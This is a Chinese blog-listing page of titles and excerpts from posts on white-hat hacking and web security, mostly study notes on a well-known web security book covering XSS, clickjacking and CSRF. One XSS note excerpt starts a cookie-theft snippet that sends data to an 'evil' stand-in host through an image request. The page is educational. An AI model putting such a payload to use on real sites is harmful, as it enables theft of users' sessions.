白帽子黑客攻防

白帽子讲Web安全 》 随手记(一)

第一遍阅读这本书是在今年春节,那时读得太匆忙,加上对Web上存在的威胁了解不多,那时并不觉这本书较同类书籍有什么特别之处。时隔3个月第二次阅读,醍醐灌顶,特别是讲解原理的部分,深入浅出,很好的梳理了各个知识点。毫无疑问,这本书不久我还会读第三遍,不愧为安全从业必读书籍。这本书的地位:这本书在安全界地位非常高。首先这本书出版时间是2012年,时间比较早,对后面出版的同类书籍有启蒙的意义,其次,201
ai_64·2020-08-16 12:39

白帽子学习笔记15】XVWA SQL Injection

白帽子学习笔记15】XVWASQLInjection–ErrorBased最后一门高数终于考完了,好开心啊有没有,终于可以自由自在的学技术了,最近准备把渗透的知识好好学一学。
Keter_·2020-08-16 07:09

正舵者受邀加入FSRF小组,成为Filecoin网络安全“白帽子”成员

2020年6月6日,正舵者荣幸接受官方邀请加入Filecoin安全小组,成为“白帽子”成员,为Filecoin主网上线贡献自己的力量。
链报·2020-08-15 17:58

一文读懂 Web 安全(面试必备)

Web安全是互联网中不可或缺的一个领域,这个领域中诞生了大量的黑帽子与白帽子,他们都是安全领域的王者,在平时里,他们利用各种巧妙的技术互相博弈,时不时就会掀起一场Web安全浪潮,真可谓神仙打架,各显神通
傲娇的koala·2020-08-14 22:32

网络安全技术及应用第3版 主编贾铁军等——教材习题 期末重点 复习题 知识提炼(第4章 黑客攻防与检测防御)

参考教材:网络安全技术及应用第3版主编贾铁军等第4章黑客攻防与检测防御填空题简答题论述题填空题(1)端口扫描的防范也称为系统“加固”,主要有防止IP地址的扫描和(关闭闲置及有潜在危险端口)。
日熙!·2020-08-14 01:33

浅谈DDos攻击与防御

最近重新拜读了道哥的经典力作《白帽子讲Web安全》一书,发觉好书看一遍是不够的,每次品味都有不同的味道。道哥此书侧重于企业安全,即所讲所写偏重企业内部的安全建设,而不是针对某些漏洞大书特书。
FLy_鹏程万里·2020-08-13 10:41

白帽子成长之路 (2019.2.6)

白帽子成长之路(2019.2.6)白帽子成长之路本人学习之路的总结,会不定时更新方向web安全渗透测试无线安全漏洞挖掘代码审计安卓/ios安全逆向密码学linux内核LoT安全就业(参考)渗透测试工程师
weixin_30449453·2020-08-12 13:24

让会议流程更科学的思维方式

3.白帽子-负责陈述事实。基于理性,数据和事实进行判断。4.黄帽子-评估建议的优点。主要是找出建议和决策的好处和优点。5.黑帽子-评估
苗宝_051b·2020-08-11 14:04

白帽子学习笔记9】渗透测试流程

白帽子学习笔记9】渗透测试流程1.渗透测试流程1.1授权未授权的渗透行为都是违法的1.2信息收集nslookupwhois等手法进行信息收集1.3扫描漏洞目的:确定有哪些漏洞namp=ip范围端口80
Keter_·2020-08-11 06:48

(文末送书)一文读懂 Web 安全

Web安全是互联网中不可或缺的一个领域,这个领域中诞生了大量的黑帽子与白帽子,他们都是安全领域的王者,在平时里,他们利用各种巧妙的技术互相博弈,时不时就会掀起一场Web安全浪潮,真可谓神仙打架,各显神通
fe_lucifer·2020-08-09 19:45

黑客攻防 远程函数命令执行高危漏洞安全开发

在对产品需求进行功能实现开发时,用了危险函数容易造成远程函数执行高危漏洞。将教你在非得使用高危函数时如何进行防御,在不使用高危函数时如何实现同样的功能。简述一下如果你一直在小公司或者外包公司做WEB后台开发,在你写程序中没有遇到被入侵的经历,或者没有个安全经验丰富的主管,在平时审核下你写的代码,那你往往不会重视安全,久而久之高危漏洞会越写越多,越加的不能提升你自己的技术水平和安全认知。如果你有在大
anquanlong·2020-08-09 19:50

漏洞信息收集之——资产梳理

不过通过不断实战,肯定可以琢磨出一些东西,所以有人称白帽子可能会比企业的运维更了解资产信息。资产梳
温柔小薛·2020-08-09 01:13

思维模型 六顶思考帽

成员们戴上白帽子对已有数据和信息进行
AGS-wangdsh·2020-08-08 23:58

Bypass WAF Cookbook

也希望整理的内容能给甲方工作者或则白帽子带来一些收获。0x00概述随着网络安全越来越受到重视,发展越来越快。随之也出现了越来越多的安全防护的软件。
weixin_30500289·2020-08-08 11:36

白帽子讲安全学习笔记(一):世界观安全

第一篇世界观安全第1章我的安全世界观安全三要素:机密性、完整性和可用性1.资产等级划分;2.威胁分析;3.风险分析;4.确认解决方案;威胁分析:风险分析-DREAD模型:白帽子兵法:1.securitybydefault
weixin_30905133·2020-08-08 00:46

白帽子讲安全学习笔记(二):客户端脚本安全

第二篇客户端脚本安全第2章浏览器安全1.同源策略:域划分2.浏览器沙箱:让不可信任的代码运行在沙箱中,以进行隔离;3.恶意网址拦截:公共组织提供黑名单;EV数字证书认证安全的网站;4.高速发展的浏览器安全浏览器设置xss攻击原则,遵循的安全策略,但是浏览器为了用户的人性化使用,设置的匹配规则往往会被黑客利用;第3章跨站脚本攻击(XSS)1.XSS简介XSS指黑客使用HTML注入篡改了页面,插入恶意
weixin_30791095·2020-08-08 00:13

Web前端黑客技术揭秘{笔记}

前些日子看完了白帽子讲Web安全,当时就PHP安全一章做了点小笔记,感觉看书还是留下点东西比较好。
weixin_30279315·2020-08-08 00:02

白帽子讲web安全》学习笔记 (3)

点击劫持(ClickJacking)点击劫持是一种视觉上的欺骗手段。攻击都使用一个透明的,不可见的iframe覆盖网站上,然后诱使用户进行操作。可以是iframe,flash,图片等常用的元素。拖拽劫持与数据窃取(以前没有听说过)目前很多的浏览器都支持Drag&Drop的API。此API是没有安全限制的。用户拖拽时,就带走了数据。触屏劫持智能手机的“触屏劫持”,与PC类似。如何防御?iframeb
weixin_30266829·2020-08-08 00:01

白帽子讲Web安全》读书笔记

闲扯再次拜读下这本书,肯定会有所新的收获。这本书之前送人了,不过忘了给谁了。。。只好下载网上的pdf版本来看了,并写下阅读笔记,内容以原文为主。前言Web是互联网的核心,是未来云计算和移动互联网的最佳载体,因此Web安全也是互联网公司业务中最重要的组成部分。安全工程师的核心竞争力不在于他能拥有多少个0day,掌握多少种安全技术,而是在于他对安全理解的深度,以及由此引申的看待安全问题的角度和高度。注
weixin_30268921·2020-08-08 00:01

web安全[网易白帽子课程笔记+体会]-02web安全基础

web安全-02web安全基础一、无处不在的安全问题1、钓鱼phishing2、篡改网页tampering3、暗链hiddenhyperlinks4、webshell二、常见Web漏洞解析常见web漏洞分类1、XSS1.1、什么是XSS1.2、存储型XSS1.3、反射型XSS1.4、DOM型XSS1.5、三种XSS对比2、CSRF2.1什么是CSRF2.2CSRF原理2.3CSRF示例3、点击劫持
双玉山人·2020-08-08 00:13

web 安全学习笔记

正好看到《白帽子讲web安全》一书,内容很不错。这里开始做一些零碎的笔记。引言里讲到了php的一些漏洞。如0字节截断漏洞,ngnix文件解析漏洞。但是没有展开讲。
sailtoyouSCU·2020-08-08 00:57

[读书笔记]《白帽子讲WEB安全》

这本书一直没时间去看,虽然有电子书但是还是喜欢纸质书本的气息,道哥作品,这本书真的是一本非常经典且非常有深度的一本安全类书籍,给予了我很大的帮助,本篇文章记录一下书中所讲不熟悉之处。安全工程师的核心竞争力不在于他能拥有多少个0day,掌握多少种安全技术,而是在于他对安全理解的深度,以及由此引申的看待安全问题的角度和高度。0x01世界观安全安全三要素机密性、完整性、可用性安全评估过程资产等级划分、威
dyboy2017·2020-08-07 23:10

白帽子讲WEB安全》学习笔记之第5章 点击劫持(clickjacking)

第5章点击劫持(clickjacking)5.1什么是点击劫持点击劫持是一种视觉上的欺骗手段。是一种在网页中将恶意代码等隐藏在看似无害的内容(如按钮)之下,并诱使用户点击的手段。主要特征q点击劫持是一种恶意***技术,用于跟踪网络用户,获取其私密信息或者通过让用户点击看似正常的网页来远程控制其电脑。很多浏览器和操作平台都有这样的漏洞。q点击劫持技术可以用嵌入代码或者文本的形式出现,在用户毫不知情的
weixin_34185560·2020-08-07 23:14

点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

黑客攻防之浏览器篇》
weixin_30682415·2020-08-07 23:12

白帽子讲Web安全》| 学习笔记之点击劫持(ClickJacking)

第5章点击劫持(ClickJacking)1、点击劫持点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。2、图片覆盖攻击点击劫持的本质是一种视觉欺骗。顺着这个思路,还有一些攻击方法
大青呐·2020-08-07 23:32

推荐信息安全书籍27本(含电子书)

【技术类——白帽子入门必看17本】Android软件安全与逆向分析Android安全攻防权威指南白帽子讲web安全恶意代码分析实
anquanniu牛油果·2020-08-07 12:00

网络安全相关书籍推荐zz

1、《网络安全基础》应用与标准第三版WilliamStallings清华大学出版社2、《黑客攻防实战详解》邓吉,柳靖电子工业出版社3、Applied
J0y4n·2020-08-07 11:58

Kali Linux-Metasploit入侵Windows10系统

KaliLinux-Metasploit入侵Windows10写在前文距离上一次写KALI黑客攻防的博文已是去年这个时候了之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的
DesolatePoison·2020-08-07 09:41

白帽子讲web扫描 读书笔记

白帽子讲web扫描读书笔记漏洞感知漏洞分析漏洞响应漏洞沉淀纵深防御建立企业专属有效的扫描体系第一章扫描器基础每个web漏洞都有自己的常见签名特征,可以通过对web应用发起http(s)请求的方式,通过其响应结果进行判断
炒鸡辣鸡复读机·2020-08-05 21:10

白帽子讲web安全(XSS)学习笔记

XSS攻击是什么通常指黑客通过“HTML注入”篡改网页、插入恶意脚本,从而在用户浏览页面是控制用户浏览器的一种攻击。XSS攻击类型反射型XSS:需要用户“点击”一个恶意链接,把用户输入的数据“反射”给浏览器,才能攻击成功。也叫做“非持久型XSS”(Non-persistentXSS)存储型XSS:会把用户输入的数据”存储“在服务器端,有很强的稳定性,也叫做”持久型XSS“(PersistentXS
weixin_42811970·2020-08-05 20:05

白帽子讲web安全笔记——XSS(一)

XSS跨站脚本攻击三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器2.存储型:把用户输入的数据“存储”在服务器端具有很强的稳定性3.DOMBased:修改页面的DOM节点形成的XSS攻击:Cookie劫持先加载一个远程脚本在evil.js中,通过代码窃取Cookievarimg=document.createElement("img");img.src="http://www.evil
奶茶里的红豆·2020-08-05 20:08

白帽子讲WEB安全》学习笔记之第16章 互联网业务安全

第16章互联网业务安全16.1产品需要什么样的安全安全是一个独立的,应该与业务持平。16.1.1互联网产品对安全的需求安全性是产品特性的一个组成部分,具备了安全性,产品才是完整的;安全做好了,产品才是最终正真的成熟。16.1.2什么是好的安全方案我认为好的方案是:q人性化q智能化q性价比高再次强调,安全是产品的一种特性,如果产品能够潜移默化地培养用户的安全习惯,将用户往更安全的行为上引导。那么这就
weixin_33819479·2020-08-05 20:17

白帽子讲WEB安全》学习笔记之第3章 跨站脚本***(xss)

第3章跨站脚本***(xss)3.1xss简介恶意***者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS***:跨站脚本***(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆。故将跨站脚本***缩写为XSS。XSS本质就是HTML注入XSS的
weixin_33785108·2020-08-05 20:15

白帽子讲WEB安全》学习笔记之第3章 跨站脚本攻击(xss)

第3章跨站脚本攻击(xss)3.1xss简介恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS攻击:跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS本质就是HTML注入XSS的分类:(1
weixin_33736649·2020-08-05 20:12

白帽子讲Web安全》- 学习笔记

一、为何要了解Web安全最近加入新公司后,公司的官网突然被Google标记为了不安全的诈骗网站,一时间我们信息技术部门成为了众矢之的,虽然老官网并不是我们开发的(因为开发老官网的前辈们全都跑路了)。我们花了很多时间做Web安全扫描以及修复,在检查和修复过程中,发现老系统的代码的不可维护性(再次说明整洁代码之道CleanCode的重要性)及安全性(同时也说明了Web安全的重要性)。修复之后,向Goo
weixin_33682790·2020-08-05 20:11

白帽子讲web安全》学习笔记(3)

第3章跨站脚本攻击(XSS)1、跨站脚本攻击(CrossSiteScript),通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,在用户浏览网页时,控制用户浏览器。属于客户端攻击,受害者最终是用户。恶意代码一般使用javascript编写。存在XSS漏洞的网站,可以盗取用户Cookie、黑掉页面、导航到恶意网站,网站挂马、XSS蠕虫。2、XSS类型。(1)反射型XSS(也叫做非持久型XS
无敌飓风小胖纸·2020-08-05 20:37

白帽子讲Web安全》| 学习笔记之Web框架安全

第12章Web框架安全1、MVC框架安全MVC是Model-View-Controller的缩写。它将web应用分为三层,View层负责用户视图、页面展示等工作,Controller负责应用的逻辑实现,接收View层传入的用户请求,并转发给对应的Model做处理;Model层则负责实现模型,完成数据的处理。在Spring框架中可以使用springsecurity来增加系统的安全性。2、模板引擎与X
大青呐·2020-08-05 19:34

白帽子讲Web安全》| 学习笔记之HTML5安全

第6章HTML5安全1、新标签的XSSHTML5中新增的一些标签和属性,使得XSS等Web攻击产生了新的变化。有安全研究员建立了一个HTML5SecurityCheatsheet项目。(链接:https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet或http://html5sec.org/)2、iframe的sandbox在HTML5中,
大青呐·2020-08-05 19:34

白帽子讲Web安全》| 学习笔记之客户端脚本安全

第二章浏览器安全1、同源策略(SameOriginPolicy),是一种约定,它是浏览器最核心也是最基本的安全功能。浏览器的同源策略,限制了来自不同源的“document"或脚本,对当前”document"读取或设置某些属性。影响“源”的因素有:host(域名或IP地址,如果是IP地址则看作一个根域名)、子域名、端口、协议。对于当前页面来说,页面内存放的javascript文件的域并不重要,重要的
大青呐·2020-08-05 19:03

白帽子讲Web安全》| 学习笔记之跨站脚本攻击(XSS)

第3章跨站脚本攻击(XSS)1、XSS跨站脚本攻击,英文全称是CrossSiteScript,本来缩写是CSS,但是为了和层叠样式表分开,所以在安全领域叫做'XSS'。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS根据效果的不同可以分成如下几类:反射型XSS,只是简单地把用户输入的数据“反射”给浏览器。也就是说,黑客往
大青呐·2020-08-05 19:03

超详细安全圈微信公众号,速度马!

安全技术长亭科技安恒信息安全研究院奇安信ATEAM深信服千里目安全实验室天融信阿尔法实验室酒仙桥六号部队看雪学院T00lsFreeBufBypass吾爱破解论坛Secquan圈子社区i春秋赛宁网安白帽学院白帽子社区国科漏斗社区云众可信黑白之道星盟安全红日安全乌云安全渗透云笔记信安之路中国白客联盟渗透测试教程悬剑武器库行长叠报
FFFIONA__·2020-08-05 19:40

白帽子讲web安全】第一章 我的安全世界观(读书笔记)

web安全简史中国黑客简史启蒙时代:中国互联网刚起步,不受利益驱使,分享自己的研究成果黄金时代:中美黑客大战,更多年轻人加入到黑客组织中,同时以盈利为目的的攻击开始黑暗时代:黑客精神(open\share\free)死亡,部分黑客步入黑色产业黑客技术的发展历程攻击系统软件:web技术还不成熟;攻击系统软件可以拿到root权限。eg:TESO写过一个攻击SSH的exploit入侵美国中情局随着防火墙
该学习了啊·2020-08-05 18:33

白帽子讲Web安全(对看书之后的一点笔记)

第一章.世界观安全1.网络安全最先研究计算机系统和网络安全的人称之为“Hacker”,人们习惯于称他们为黑客。字面意思的理解就是专门破坏规则,寻找一些系统漏洞,以获得某些权力。对于现在计算机最高的权限是“root”.漏洞能够帮助黑客利用代码拿到他们想得到的东西。黑客使用的漏洞代码是“exploit”.2.黑客的发展起初黑客攻击系统软件的居多,能够获取到“root”权限,(著名的黑客组织TESO)早
Serendipity_筱楠·2020-08-05 18:01

白帽子讲Web安全学习笔记之客户端脚本安全

#白帽子讲Web安全学习笔记之客户端脚本安全浏览器安全    主要的浏览器的安全功能如下:###1、同源策略    同源策略是一种约定,它是浏览器最核心也是最基本的安全功能,若缺少了则浏览器的正常功能可能都会受到影响
钝之·2020-08-05 18:18

白帽子讲Web安全》学习笔记01 XSS

白帽子讲Web安全》学习笔记01XSSDOMBasedXSS通过修改页面的DOM节点形成的XSSXSSpayload窃取cookie构造GET和POST请求GETDOMBasedXSS通过修改页面的DOM
WustHandy·2020-08-05 17:59

白帽子讲Web安全(第 3 章 跨站脚本攻击( XSS ))

第3章跨站脚本攻击(XSS)3.1XSS简介跨站脚本攻击,英文全称是CrossSiteScript,本来缩写是CSS,但是为了和层叠样式表(CascadingStyleSheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站
sports-boy·2020-08-05 09:12

【Kali】——认识Kali 2.0

KaliLinux是基于Debian的Linux发行版,设计用于数字取证和渗透测试和黑客攻防。由OffensiveSecurityLtd维护和资助。
X0__0X·2020-08-04 10:24

黑客入门知识分享

萌新博主有幸阅读了《白帽子讲Web安全》前辈的著作,深受启发,在此引用前辈的语句,作为文章的开篇,成为黑客的第一步,开始阅读吧!安全问题的本质是信任的问题。
Serendipper_constan·2020-08-04 07:19

“黑客”深度学习之“游戏外挂原理实现”之美

我回答“我是一个白帽子黑客”。“那能不能帮我攻入游戏系统做一款游戏外挂,咱们一起赚钱?”我就只能呵呵了,肯定是不可以的,技术上虽然可以实现但是原则上一定不要那么做。
梦小娴·2020-08-03 12:30

还在为参数校验发愁?spring-validation最佳实践指南

最近线上接口受到白帽子攻击,由于后端接口没有严格地进行参数校验,从而导致了系统程序异常和线上脏数据的问题。为了项目中参数校验方式的统一,因此在项目中引入了spring-validation。
6点半起床·2020-08-03 10:15
上一页 8 9 10 11 12 13 14 15 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他